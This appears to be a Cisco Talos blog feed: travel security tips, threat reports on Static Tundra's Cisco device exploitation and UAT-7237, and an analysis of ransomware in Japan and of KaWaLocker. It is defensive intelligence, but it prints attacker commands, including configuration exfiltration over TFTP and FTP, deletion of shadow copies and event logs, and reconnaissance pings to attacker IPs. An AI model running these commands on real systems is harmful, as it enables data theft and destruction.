Amy (ahem, Special Agent Dale Cooper) shares lessons from their trip to the Olympic Peninsula and cybersecurity travel tips for your last-minute adventures.

Thursday, August 21, 2025 14:00

(Welcome to this week’s edition of the Threat Source newsletter.) 

Diane, 

2:01 p.m., August 21st. I’ve just returned from a remarkable journey through Seattle and the misty roads of the Olympic Peninsula. If you ever find yourself driving beneath those towering Douglas firs or dragged by your partner through the Twilight Museum in Forks, I recommend stopping for a cup of hot, black coffee and a slice of cherry pie at any roadside diner. It’s nothing short of extraordinary.  

But as I navigated the Rialto Beach tidepools (at 5:30 a.m., no less) and moss-laden trees of the Hoh Rainforest, I made a classic misstep: I forgot to connect to Wi-Fi the entire trip. By the time I returned, my high-speed data allowance had vanished into the mist, leaving me puzzled and restarting my cell phone for days — a humbling reminder that even seasoned agents can overlook the basics. 

Travel is a curious thing, Diane. When you’re on the road, it’s easy to let your guard down, become enchanted by the scenery and forget that digital dangers can lurk behind every public WiFi signal or seemingly harmless USB charging station. 

As the summer draws to a close and more people venture out of Twin Peaks for those last-minute adventures, I’ve compiled a list of field-tested precautions for the journey ahead, because even professionals need a reminder sometimes: 

1.  Update your devices and back up important data before you leave. If a device is lost, stolen or infected with malware, you’ll still have access to your files. 
2.  Turn off auto-connect features to reduce the risk of connecting to rogue networks or devices. 
3.  Only take what you need. The fewer devices you take, the fewer you have to keep track of and worry about. 
4.  Limit the use of location services on your devices and apps unless necessary. This protects your privacy and reduces the risk of targeted attacks while traveling. 
5.  Steer clear of public computers in hotel lobbies and libraries, especially for accessing sensitive accounts. If you must use them — or if you log in to any streaming services during your stay —  don't forget to log out of your accounts. 
6.  Public WiFi is convenient, but we know its security can be questionable. Use a VPN or your phone’s hotspot for a more secure connection. 
7.  Set up device tracking (like Find My iPhone or Find My Device) and know how to remotely wipe your device in case it’s lost or stolen. 
8.  Take a power bank with you to avoid using USB charging stations, which could result in malware being downloaded to your device. 

Diane, the woods are lovely, dark and deep, and so are the digital trails we leave behind. Stay vigilant, stay caffeinated and remember that the best protection is awareness. 

Special Agent Dale Cooper

**The one big thing **

Static Tundra, a Russian state-backed group, is exploiting end-of-life and unpatched Cisco network devices using a seven-year-old patched vulnerability (CVE-2018-0171) to steal data and maintain long-term hidden access in organizations worldwide. Their tactics include persistent implants and bespoke SNMP tools to exfiltrate data and maintain undetected access, with a focus on entities of strategic interest to the Russian government. We urge immediate patching or disabling of at-risk features to prevent compromise. 

**Why do I care? **

If your organization uses Cisco devices that haven’t been patched or replaced, you could be vulnerable to undetected cyberattacks and data breaches—even if the vulnerability is years old. This risk affects organizations of all sizes and industries, putting sensitive data and business operations in jeopardy. 

**So now what? **

Immediately review your network infrastructure for unpatched or end-of-life Cisco devices and apply available patches or disable vulnerable features as recommended. Ongoing security hardening, regular updates and vigilant monitoring are critical to defend against this and similar state-sponsored threats.

**Top security headlines of the week **

**Workday Data Breach Bears Signs of Widespread Salesforce Hack**   
Workday said threat actors gained access to a third-party customer relationship management (CRM) system and obtained “commonly available business contact information” such as names, phone numbers, and email addresses. (SecurityWeek) 

**Novel 5G Attack Bypasses Need for Malicious Base Station**   
A team of researchers from the Singapore University of Technology and Design released a framework named Sni5Gect that can be used to sniff messages and perform message injection in 5G communications. (SecurityWeek) 

**Internet-wide Vulnerability Enables Giant DDoS Attacks**   
Researchers from Tel Aviv University have identified a way around the Rapid Reset fix called "MadeYouReset," and it's raising the possibility that attackers could enact cyberattacks against up to one-third of all websites globally. (Dark Reading) 

**Threat Actors Allegedly Listed Windows Zero-Day RCE Exploit For Sale on Dark Web**   
The threat actor claims it targets fully updated Windows 10, Windows 11, and Windows Server 2022 systems. The sale conditions emphasize exclusivity, prohibiting resale unless explicitly negotiated, which is typical for premium exploits. (Cybersecurity News) 

**XenoRAT malware campaign hits multiple embassies in South Korea**    
The targets were generally European embassies in Seoul and the themes included fake meeting invites, official letters, and event invitations, often sent from impersonated diplomats. (BleepingComputer)

**Can’t get enough Talos? **

**The art of controlling information**   
JJ Cummings leads Talos' Threat Intelligence and Interdiction team on nation-state security and intelligence. He shares his story, thoughts on burnout and motivation, and advice for anyone looking to join Talos.

**Ransomware incidents in Japan during the first half of 2025**   
In the first half of 2025, the number of ransomware attacks in Japan increased by approximately 1.4 times compared to the previous year. Read our blog to learn the most recent trends.

**Cyber Analyst Series: Cybersecurity overview and the role of the cybersecurity analyst**   
A series of videos on the profession of cybersecurity analysts made in conjunction with the Ministry of Digital Transformation of Ukraine for Diia.Education (available in English and Ukrainian languages).

**Upcoming events where you can find Talos **

*   BlueTeamCon (Sept. 4 – 7) Chicago, IL 
*   LABScon (Sept. 17 – 20) Scottsdale, AZ 
*   VB2025 (Sept. 24 – 26) Berlin, Germany 

**Most prevalent malware files from Talos telemetry over the past week**

**SHA256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca**     
MD5: 71fea034b422e4a17ebb06022532fdde      
VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca/details  
Typical Filename: VID001.exe      
Claimed Product: N/A      
Detection Name: Coinminer:MBT.26mw.in14.Talos  

**SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507**    
MD5: 2915b3f8b703eb744fc54c81f4a9c67f    
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507     
Typical Filename: VID001.exe    
Claimed Product: N/A    
Detection Name: Win.Worm.Coinminer::1201 

**SHA 256: 41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610**    
MD5: 85bbddc502f7b10871621fd460243fbc     
VirusTotal: https://www.virustotal.com/gui/file/41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610/details    
Typical Filename: N/A    
Claimed Product: Self-extracting archive    
Detection Name: Win.Worm.Bitmin-9847045-0 

**SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91**      
MD5: 7bdbd180c081fa63ca94f9c22c457376    
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details    
Typical Filename: IMG001.exe    
Detection Name: Simple\_Custom\_Detection    

**SHA 256: 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa**    
MD5: df11b3105df8d7c70e7b501e210e3cc3    
VirusTotal: https://www.virustotal.com/gui/file/59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa/details    
Typical Filename: DOC001.exe    
Claimed Product: N/A    
Detection Name: Win.Worm.Coinminer::1201

Cherry pie, Douglas firs and the last trip of the summer

A Russian state-sponsored group, Static Tundra, is exploiting an old Cisco IOS vulnerability to compromise unpatched network devices worldwide, targeting key sectors for intelligence gathering.

Wednesday, August 20, 2025 09:00

*   **Static Tundra is a Russian state-sponsored cyber espionage group** linked to the FSB's Center 16 unit that has been operating for over a decade, specializing in compromising network devices for long-term intelligence gathering operations.
*   **The group actively exploits a seven-year-old vulnerability (CVE-2018-0171),** which was patched at the time of the vulnerability publications, in Cisco IOS software's Smart Install feature, targeting unpatched and end-of-life network devices to steal configuration data and establish persistent access.
*   **Primary targets include organizations in telecommunications, higher education and manufacturing sectors** across North America, Asia, Africa and Europe, with victims selected based on their strategic interest to the Russian government.
*   **Static Tundra employs sophisticated persistence techniques** including the historic SYNful Knock firmware implant (first reported in 2015) and bespoke SNMP tooling to maintain undetected access for multiple years.
*   **The threat extends beyond Russia's operations** — other state-sponsored actors are likely conducting similar network device compromise campaigns, making comprehensive patching and security hardening critical for all organizations.
*   **Threat actors will continue** to abuse devices which remain unpatched and have Smart Install enabled.
*   Customers are urged to apply the patch for CVE-2018-0171 or to disable Smart Install as indicated in the advisory if patching is not an option. Customer support is available if needed by initiating a TAC request.

Since 2015, Cisco Talos has observed the compromise of unpatched and often end-of-life Cisco networking devices by a highly sophisticated threat actor. Based on sufficient recent activity observed through our ongoing analysis, we have designated this threat cluster “Static Tundra.” This blog highlights our observations regarding this threat actor and provides recommendations for detecting and preventing activities associated with Static Tundra.

**Threat actor and campaign overview**

Talos assesses with high confidence that Static Tundra is a Russian state-sponsored cyber espionage group specializing in network device exploitation to support long-term intrusion campaigns into organizations that are of strategic interest to the Russian government. Static Tundra is likely a sub-cluster of another group, “Energetic Bear” (aka BERSERK BEAR), based on an overlap in tactics, techniques and procedures (TTPs) and victimology, which has been corroborated by the FBI. Energetic Bear was linked to the Russian Federal Security Service’s (FSB) Center 16 unit in a 2022 U.S. Department of Justice indictment. Talos also assesses with moderate confidence that Static Tundra is associated with the historic use of “SYNful Knock,” a malicious implant installed on compromised Cisco devices publicly reported in 2015.

Static Tundra is assessed to be a highly sophisticated cyber threat actor that has operated for over a decade, conducting long-term espionage operations. Static Tundra specializes in network intrusions, demonstrated by the group's advanced knowledge of network devices and use of bespoke tooling, possibly including the novel, but now decade-old, SYNful Knock router implant.

Static Tundra targets unpatched, and often end-of-life, network devices to establish access on primary targets and support secondary operations against related targets of interest. Once they establish initial access to a network device, Static Tundra will pivot further into the target environment, compromising additional network devices and establishing channels for long-term persistence and information gathering. This is demonstrated by the group’s ability to maintain access in target environments for multiple years without being detected.

For years, Static Tundra has been compromising Cisco devices by exploiting a previously disclosed vulnerability in the Smart Install feature of Cisco IOS software and Cisco IOS XE software (CVE-2018-0171) that has been left unpatched, often after those devices are end-of-life. We assess that the purpose of this campaign is to compromise and extract device configuration information en masse, which can later be leveraged as needed based on then-current strategic goals and interests of the Russian government. This is demonstrated by Static Tundra’s adaptation and shifts in operational focus as Russia’s priorities have changed over time.

Since Static Tundra was first observed in 2015, the group has targeted organizations in the telecommunications, higher education and manufacturing sectors. Victims are primarily based in Ukraine and allied countries, but also include other entities globally. Talos estimates Static Tundra will continue network intrusion campaigns into organizations that are of strategic interest to Russia, specifically manufacturing and higher education, and targets of political interest will likely continue to include Ukraine and its allies.

While this blog focuses on Static Tundra's ongoing campaign against network devices, many other state-sponsored actors also covet the access these devices afford, as we have warned many times over the years. Organizations should be aware that other advanced persistent threats (APTs) are likely prioritizing carrying out similar operations as well.

**Targeting and victimology**

Static Tundra has been observed as primarily targeting organizations in the telecommunications, higher education and manufacturing sectors, pivoting over time in alignment with shifts in Russian strategic interests. Known victims span multiple geographic regions, including North America, Asia, Africa and Europe.

One of the clearer targeting shifts we observed was that Static Tundra’s operations against entities in Ukraine escalated at the start of the Russia-Ukraine war, and have remained high since then. Static Tundra was observed compromising Ukrainian organizations in multiple verticals, as opposed to previously more limited, selective compromises typically being associated with this threat actor.

**Tactics, techniques and procedures (TTPs)**

We assess that Static Tundra’s two primary operational objectives are 1) compromising network devices to gather sensitive device configuration information that can be leveraged to support future operations, and 2) establishing persistent access to network environments to support long-term espionage in alignment with Russian strategic interests. Because of the large global presence of Cisco network infrastructure and the potential access it affords, the group focuses heavily on the exploitation of these devices and possibly also the development of tools to interact with and persist on these devices. Static Tundra utilizes bespoke tooling that prioritizes persistence and stealth to achieve these objectives. The tooling and techniques target old and unpatched edge devices.

**Initial access**

Since at least 2021, Static Tundra has been observed aggressively exploiting CVE-2018-0171, a known and patched vulnerability in Cisco IOS software and Cisco IOS XE software that could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device.

Cisco issued a patch for CVE-2018-0171 in 2018. As advised previously by Cisco, customers are strongly urged to apply the patch immediately given active and ongoing exploitation of the vulnerability by sophisticated state-sponsored or state-aligned active persistent threat (APT) groups. Devices that are beyond end of life and cannot support the patch require additional security precautions as detailed in the 2018 security advisory. **Unpatched devices with Smart Install enabled will** **continue to be vulnerable to these and other attacks unless and until customers take action****.**

Talos assesses with moderate confidence that Static Tundra leverages bespoke tooling to automate the exploitation of CVE-2018-0171 and subsequent configuration exfiltration against a predefined set of target IP addresses, likely gathered using publicly available scan data from a service such as Shodan or Censys. The process is similar to those that have been reported publicly in red teaming blogs and similar publications.

After gaining initial entry via exploitation of the Smart Install vulnerability, Static Tundra’s CVE-2018-0171 attack chain continues by issuing a command that will modify the running configuration and enable the local Trivial File Transfer Protocol (TFTP) server:

tftp-server nvram:startup-config

This then allows Static Tundra to make a follow-up connection to the newly spawned TFTP server to retrieve the startup configuration. The extracted configuration may reveal credentials and/or Simple Network Management Protocol (SNMP) community strings that can then be leveraged for more direct access to the system.

Static Tundra has also been observed making initial access to devices via SNMP, leveraging a community string that was either compromised in a previous attack or guessed. In some cases, the group used insecure community strings of "anonymous" and "public" with read-write permissions.

**Execution**

Upon gaining initial access to a target environment, Static Tundra interacts with the SNMP service using community strings that were compromised during the initial access phase. In some cases, Static Tundra spoofs the source address of the SNMP traffic. This technique allows the threat actor to obfuscate their infrastructure and bypass access control lists (ACLs), as the SNMP protocol does not use session establishment. SNMP offers a variety of options for further execution on a compromised device, such as executing commands directly, modifying the running configuration and extracting the current running configuration or startup configuration.

Static Tundra leverages SNMP to send instructions to download a text file from a remote server and append it to the running configuration. This can allow for additional means of access via newly created local user accounts in conjunction with enabling remote services including TELNET.

**Persistence**

Due to the relatively static nature of network environments, Static Tundra often relies on compromised SNMP community strings and credentials to maintain access to systems over the course of multiple years. In some cases, Static Tundra creates privileged local user accounts and/or additional SNMP community read-write strings.

Static Tundra has been observed leveraging a Cisco IOS firmware implant known as SYNful Knock to achieve persistent access to compromised systems. SYNful Knock is a modular implant that attackers inject into a Cisco IOS image and then load onto the compromised device. This provides a stealthy means of access that will persist through reboots. Remote access to the device can then be achieved by sending a specifically crafted TCP SYN packet, commonly referred to as a “magic packet.” Additional information, including a full technical write-up, can be found in a 2015 blog published by Mandiant with additional details from a 2015 Cisco blog. Additionally, Talos has published a script that can be used to scan for and detect the SYNful Knock implant.

**Defense evasion**

Static Tundra has been observed modifying TACACS+ configuration on compromised devices, hindering remote logging capabilities. Static Tundra also modifies access control lists (ACLs) to permit access from specific IP addresses or ranges under their control.

**Discovery**

Static Tundra likely uses publicly-available scan data from services such as Shodan or Censys to identify systems of interest. Once inside a target environment, Static Tundra relies heavily on native commands, such as “show cdp neighbors”, to reveal additional systems of interest within the target environment. This presents a relatively stealthy way to identify further targets without the need for active scanning.

**Collection**

One of Static Tundra’s primary actions on objectives is to capture network traffic that would be of value from an intelligence perspective. To achieve this, Static Tundra establishes Generic Routing Encapsulation (GRE) tunnels that redirect traffic of interest to attacker-controlled infrastructure, which can then be captured and further analyzed. Static Tundra has also been observed collecting and exfiltrating NetFlow data on compromised systems, revealing source and destination information on streams of potential interest.

**Exfiltration**

Static Tundra exfiltrates configuration information through a variety of means, including inbound TFTP connections via the Smart Install exploitation procedure mentioned in the Initial Access section, outbound TFTP or FTP connections from the compromised device to attacker-controlled infrastructure, and inbound SNMP connections using the copy configuration process.

Static Tundra leverages bespoke SNMP tooling and functionality provided by the CISCO-CONFIG-COPY-MIB to exfiltrate configurations from compromised devices via either TFTP or Remote Copy Protocol (RCP).

Static Tundra has been observed using the following commands to exfiltrate configuration files via TFTP and FTP:

do show running-config | redirect tftp://:/conf\_bckp
copy running-config ftp://user:pass@/output.txt

**Detection**

Talos recommends taking the following steps to identify suspicious activity that may be related to this campaign:

*   Conduct comprehensive configuration management (including auditing), in line with best practices.
*   Conduct comprehensive authentication, authorization and command issuance monitoring.
*   Monitor syslog and AAA logs for unusual activity, including a decrease in normal logging events, or a gap in logged activity.
*   Monitor your environment for unusual changes in behavior or configuration.
*   Profile (fingerprint via NetFlow and port scanning) network devices for a shift in surface view, including new ports opening/closing and traffic to/from (not traversing).
*   Where possible, develop NetFlow visibility to identify unusual volumetric changes.
*   Look for non-empty or unusually large .bash\_history files.

Additional identification and detection can be performed using the Cisco forensic guides.

**Preventative measures**

The following strong recommendations apply to entities in all sectors.

*   **Cisco-specific measures**
    *   Apply the patch for CVE-2018-0171.
        *   Disable Smart Install as indicated in the advisory if patching is not an option.
    *   Leverage Cisco Hardening Guides when configuring devices.
    *   Disable telnet and ensure it is not available on any of the Virtual Teletype (VTY) lines on Cisco devices by configuring all VTY stanzas with “transport input ssh” and “transport output none”.
    *   Disable Cisco’s Smart Install service using “no vstack” for any device where application of the available patch for CVE 2018-0171 is infeasible, and develop end-of-life management plans for technology too old to patch.
    *   Utilize Type 8 passwords for local account credential configuration.
    *   Utilize Type 6 for TACACS+ key configuration.
*   **General measures**
    *   Rigorously adhere to security best practices, including updating, access controls, user education and network segmentation.
    *   Stay up to date on security advisories from the U.S. government and industry and consider suggested configuration changes to mitigate described issues.
    *   Update devices as aggressively as possible. This includes patching current hardware and software against known vulnerabilities and replacing end-of- life hardware and software.
        *   Select complex passwords and community strings and avoid default credentials.
    *   Use multi-factor authentication (MFA).
    *   Encrypt all monitoring and configuration traffic (e.g., SNMPv3, HTTPS, SSH, NETCONF, RESTCONF).
    *   Lock down and aggressively monitor credential systems, such as TACACS+ and any jump hosts.
    *   Utilize AAA to deny configuration modifications of key device protections (e.g., local accounts, TACACS+, RADIUS).
    *   Prevent and monitor for exposure of administrative or unusual interfaces (e.g., SNMP, SSH, HTTP, HTTPS).
    *   Disable all non-encrypted web management capabilities.
    *   Verify existence and correctness of access control lists for all management protocols (e.g., SNMP, SSH, Netconf, etc.).
    *   Store configurations centrally and push to devices. Do NOT allow devices to be the trusted source of truth for their configurations.

**Indicators of compromise (IOCs)**

**Indicator**

**Type**

**Known Activity**

185.141.24\[.\]222

IP Address

2023/03/23

185.82.202\[.\]34

IP Address

2025/01/15 – 2025/02/28

185.141.24\[.\]28

IP Address

2024/10/01 – 2025/07/03

185.82.200\[.\]181

IP Address

2024/10/01 – 2024/11/15

Russian state-sponsored espionage group Static Tundra compromises unpatched end-of-life network devices

Ransomware attackers continue to primarily target small and medium-sized manufacturing businesses in Japan.

Tuesday, August 19, 2025 06:00

*   In the first half of 2025, the number of ransomware attacks in Japan increased by approximately 1.4 times compared to the previous year.
*   Ransomware attackers continue to primarily target small and medium-sized enterprises in Japan. The most affected industry remains manufacturing, unchanged from last year.
*   The ransomware group causing the most damage in Japan is "Qilin."
*   In late June, a new ransomware group called "Kawa4096" emerged and might have attacked two Japanese companies.

**Victimized companies**

Figure 1 summarizes the ransomware incidents involving Japanese domestic companies, including overseas branches and subsidiaries, from January 1 to June 30, 2025. According to the Cisco Talos investigation, there were 68 ransomware cases affecting organizations in Japan during this period. Sources include Cisco telemetry, official statements from affected companies, news reports and data from ransomware leak sites. Compared to 48 cases during the same period last year, this represents an approximately 1.4-fold increase. The number of incidents per month ranged from a minimum of 4 to a maximum of 16, with an average of about 11 ransomware attacks per month.

__Figure 1. Ransomware incidents in Japan during the first half of 2025.__

The industries affected remain largely unchanged from the same period last year, with the manufacturing sector experiencing the highest number of incidents at 18.2%, followed by the automotive sector with 5 cases (5.7%), and trading companies, construction and transportation each reporting 4 cases (4.6%).

__Figure 2. Number of victim organizations by industry.__

Regarding the size of the affected organizations, those with capital of less than 100 million yen (or ¥) accounted for the largest share at 38%, followed by those with capital from ¥100 million – 1 billion at 31%. In total, organizations with capital under ¥1 billion made up 69% of all cases, indicating that attackers continue to primarily target small and medium-sized enterprises (see Figure 3).

__Figure 3. Classification of victim organizations by capital size.__

**Types of ransomware most frequently involved in incidents**

LockBit and 8base, which were among the most frequently observed ransomware groups in Japan during the first half of FY2024, ceased their activities following takedown operations by law enforcement in February 2024 and February 2025 respectively, as publicly announced in press releases. As a result, neither group has been observed in 2025.

RansomHub and Hunters International, which ranked among the top ransomware groups last year, are confirmed to still be active in Japan. Notably, the ransomware group Qilin, which had not been reported to have caused any damage in Japan in FY2024, emerged as the most active group in the first half of FY2025, with eight confirmed victim organizations in the country. Qilin has been active since October 2022 and is one of the ransomware groups exerting significant influence both domestically and internationally. The findings from this investigation further suggest that Qilin’s activity is intensifying, making it one of the most critical groups to watch.

Following Qilin, three groups — Lynx, Nightspire, and RansomHub — accounted for three incidents each. Regarding RansomHub, attacks targeting Japan were also confirmed around the same time in 2024. Groups such as Akira, Cicada3301, Gunra, Kawa4096 and Space Bears were each responsible for two incidents. In particular, Kawa4096, which began operations in late June 2025, has targeted Japan from the outset, warranting special attention.

Other groups with one confirmed incident each include Black Suit, CLOP, Devman, Fog and Play, among others.

__Figure 4. Identified ransomware employed in attacks.__

**Spotlight: Kawa4096 ransomware group**

Trustwave published a useful analysis report on Kawa4096 in July 2025.

The ransomware group first posted about a victim organization on its leak site, shown in Figure 5, on June 19, 2025. Subsequently, it disclosed information believed to pertain to attacks on two Japanese companies on June 26 and June 28.

__Figure 5. Kawa4096 leak site.__

**KaWaLocker ransomware deployed by Kawa4096****Config File**

The ransomware used by this group, shown in Figure 6, utilizes the FindResourceW API to load a configuration file from the resource section, as illustrated in Figure 7. The configuration file defines items such as file extensions, directories and specific folders to exclude from encryption; processes and services to terminate; and commands to execute. In the example configuration file shown in the figure, the command to be executed via WMI is defined as <cmd\_post value="calc">, which causes the calculator to launch. Since it only launches the calculator after encryption, it is likely being used to check whether the configuration has been correctly applied. Depending on the value set, arbitrary commands can be executed. In other configuration files, Talos has also confirmed cases where a forced reboot is triggered after encryption using the command shutdown /r /t 0.

__Figure 6. Loading RCDATA101 from the resource section.__

__Figure 7. Part of the configuration file defined in RCDATA101.__

**Creating new file extensions and icons**

The file extension added after encryption is also determined by a value loaded from the resource section, just like the configuration file. Specifically, the ransomware sets the extension using the data starting 8 bytes from the loaded value, and uses the following 9 bytes as the new extension.

__Figure 8. Loading RCDATA102 from the resource section.__

__Figure 9. Part of RCDATA102.__

Once the extension name for the encrypted files is determined, an icon file used after encryption is created at the following path using the CreateFileW API:

C:\Users\Public\Documents\.C3680868C.ico

After that, a new key named “.C3680868C” is created under “HKEY\_LOCAL\_MACHINE\\Software\\Classes” in the registry, with a subkey DefaultIcon whose value is set to the path of the icon mentioned above.

__Figure 10. Registration of a custom file extension.__

__Figure 11. Encrypted file.__

**Types of arguments**

This ransomware checks for the presence of the “all” argument upon execution. (Figure 12)

__Figure 12. Argument check.__

Below is a summary of the three arguments:

*   \-all: Executes the ransomware's processing using multithreading
*   \-d: Encrypts only the specified directory
*   \-dump: Uses the MiniDumpWriteDump API to create a .dmp file containing crash or runtime information in the execution folder

When the -all option is not specified, the ransomware re-executes itself as "%ws" -all using the CreateProcessW API. Additionally, only when -all is not specified, the ransomware creates a Mutex named "SAY\_HI\_2025" using the CreateMutexA API to check whether it is already running.

__Figure 13. Creation of Mutex value.__

**Ransom note**

A ransom note named “!!Restore-My-file-Kavva.txt,” as shown in Figure 13, is created in C:\\ and in each encrypted folder. The ransom note primarily states that the system has been encrypted and that important data has been stolen — characteristics typical of double-extortion ransomware. It warns that if communication is refused, the data will be published. It also specifies the types of data involved, such as employees’ personal information and customer information, making it clear that the attackers are urging the victim to initiate contact with them.

__Figure 14. KaWaLocker ransom note.__

**Data deletion**

After file encryption, the following commands are executed to prevent recovery by deleting backup-related data and traces, such as event logs.

vssadmin.exe Delete Shadows /all /quiet
vssadmin.exe delete shadows /all /quiet
wmic shadowcopy delete /nointeractive
cmd.exe /c wevtutil cl security | wevtutil cl system | wevtutil cl application

Depending on the configuration settings, the program may also delete itself.

cmd.exe /C ping 127.0.0.1 -n 2 > nul && del /F

**Encryption**

Regarding the encryption method, the chunk size is determined based on the size of the target file, and the number of chunks is decided accordingly. For files smaller than or equal to 10MB, the data is not split for encryption. However, for files larger than 10MB, the file is divided based on varying chunk sizes according to file size, as shown in Figure 15. The base chunk size is defined by the value at offset (a1 + 488), which is set to 0x10000 (64KB). Figure 16 shows the chunk sizes corresponding to different file sizes. This implementation improves encryption performance by accelerating the processing of files.

__Figure 15. Code section that determines the number of chunks based on the file size.__

__Figure 16. File size and chunk size correspondence table.__

Once the chunk count is determined, the target data is encrypted using the Salsa20 stream cipher.

__Figure 17. Encryption method.__

**KaWaLocker 2.0**

We also observed KaWaLocker 2.0 in late July 2025. This indicates that the attackers may become even more active in deploying this malware in the future. One of the main changes is that the ransom note differs from the initial version of KaWaLocker. As shown in Figure 17, the ransom note for KaWaLocker 2.0 includes a newly added email contact.

__Figure 18. KaWaLocker2.0 ransom note.__

Another change is that when examining the configuration of KaWaLocker 2.0, we found that a flag called “hide\_name” had been added.

__Figure 19. KaWaLocker config (left), KaWaLocker 2.0 config (right).__

When this flag is enabled, the file name is changed and encrypted based on the absolute file path using a hash function.

__Figure 20. Encrypted file when the hide\_name flag is enabled.__

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.

ClamAV detections are also available for this threat:

*   Win.Ransomware.KaWaLocker-10056371-0
**Indicators of compromise (IOCs)**

The IOCs can also be found in our GitHub repository here.

Ransomware incidents in Japan during the first half of 2025

Get an inside look at how JJ Cummings helped build and lead one of Cisco Talos’ most impactful security teams, and discover what drives him to stay at the forefront of threat intelligence.

Tuesday, August 19, 2025 06:00

Welcome to the second episode of Humans of Talos, our ongoing video interview series that celebrates the people powering Cisco’s threat intelligence efforts. In each episode, we dive deep into the personal journeys, motivations and lessons learned from the team members who help keep the internet safe. This episode, let's meet JJ Cummings, who leads our Threat Intelligence and Interdiction team, focusing on nation-state security and intelligence. Read (or watch) on for JJ’s story, his thoughts on burnout and motivation, and advice for anyone looking to join Talos.

**Amy Ciminnisi: Hello and welcome to the second episode of Humans of Talos. I'm here with JJ Cummings today, who leads a team on our Threat Intelligence and Interdiction team, focused on nation state security and intelligence matters. What led you to your role at Talos?**

JJ Cummings: Prior to Talos' formal formation, or creation, I was a part of the Sourcefire acquisition, and I was a part of Sourcefire for many years. We helped with deep investigations and analysis and incident response and threat hunting. Then that moved into the Cisco world when Cisco acquired us. We determined that there was kind of the need for a Threat Intelligence team. There was an opportunity for me to come over to start to build out the capabilities and the path forward with Matt Olney, Ryan Pentney and several others. From there, the Threat Intelligence and Interdiction team grew to what it is today.

**AC: What is something about your day to day role at Talos that people might be particularly surprised by or interested in?**

JC: One of the challenges when we're working with a lot of different partners is how we control the information. Some partners tell us, "Hey, we want feedback, but you can't tell anybody else," which is really difficult. We take that information and we try to identify our own ways to point to how we identified it so it doesn't burn that partner. We have to find ways to highlight things in unattributable or alternatively attributable ways. But the good news is that I've got an amazing team behind me. They're force multipliers and they are beasts when it comes to getting the job done.

_Want to see more?_ _Watch the full interview__, and don’t forget to subscribe to our YouTube channel for future episodes of Humans of Talos!_

JJ Cummings: The art of controlling information

Cisco Talos discovered UAT-7237, a Chinese-speaking advanced persistent threat (APT) group active since at least 2022, which has significant overlaps with UAT-5918.

*   Cisco Talos discovered UAT-7237, a Chinese-speaking advanced persistent threat (APT) group active since at least 2022, which has significant overlaps with UAT-5918.
*   UAT-7237 conducted a recent intrusion targeting web infrastructure entities within Taiwan and relies heavily on the use of open-sourced tooling, customized to a certain degree, likely to evade detection and conduct malicious activities within the compromised enterprise.
*   UAT-7237 aims to establish long-term persistence in high-value victim environments.
*   Talos also identified a customized Shellcode loader in UAT-7237's arsenal that we track as “SoundBill.” SoundBill can be used to decode and load any shellcode, including Cobalt Strike.

Talos assesses with high confidence that UAT-7237 is a Chinese-speaking APT group, focusing heavily on establishing long-term persistence in web infrastructure entities in Taiwan. Most of UAT-7237's tooling consists of open-sourced tools, customized to a certain extent, including the use of a customized Shellcode loader we track as “SoundBill.”

Talos further assesses that UAT-7237 is likely a subgroup of UAT-5918, operating under the same umbrella of threat actors. UAT-7237's tooling, victimology and dates of activity overlap significantly with UAT-5918. Additionally, both threat groups develop, customize and operate tooling using the Chinese language as their preliminary language of choice.

While Talos assesses that UAT-7237 is a subgroup of UAT-5918, there are some deviations in UAT-7237's tactics, techniques and procedures (TTPs) that necessitate its designation as a distinct threat actor:

*   UAT-7237 primarily relies on the use of Cobalt Strike as its staple backdoor implant while UAT-5918 relies primarily on Meterpreter based reverse shells.
*   After a successful compromise, UAT-5918 typically deploys a flurry of web shells. However, UAT-7237's deployment of web shells is highly selective and only on a chosen few compromised endpoints.
*   While UAT-5918 relies on web shells as their primary channel of backdoor access, UAT-7237 relies on a combination of direct remote desktop protocol (RDP) access and SoftEther VPN clients to achieve the same.

In a recent intrusion, UAT-7237 compromised, infiltrated and established long term persistence in a Taiwanese web hosting provider. It is worth noting that the threat actor had a particular interest in gaining access to the victim organization’s VPN and cloud infrastructure. UAT-7237 used open-source and customized tooling to perform several malicious operations in the enterprise, including reconnaissance, credential extraction, deploying bespoke malware, setting up backdoored access via VPN clients, network scanning and proliferation.

**Initial access and reconnaissance**

UAT-7237 gains initial access by exploiting known vulnerabilities on unpatched servers exposed to the internet. Once the target has been successfully compromised, UAT-7237, like any other stealth-oriented APT, conducts rapid fingerprinting to evaluate if the target is worth conducting further malicious actions on.

Reconnaissance consists of identifying remote hosts, both internal and on the internet:

cmd /c nslookup <victim’s\_domain>
cmd /c systeminfo
cmd /c curl
cmd /c ping 8\[.\]8\[.\]8\[.\]8                            
cmd /c ping 141\[.\]164\[.\]50\[.\]141          // Attacker controlled remote server.
cmd /c ping <victim’s\_domain>
cmd /c ipconfig /all

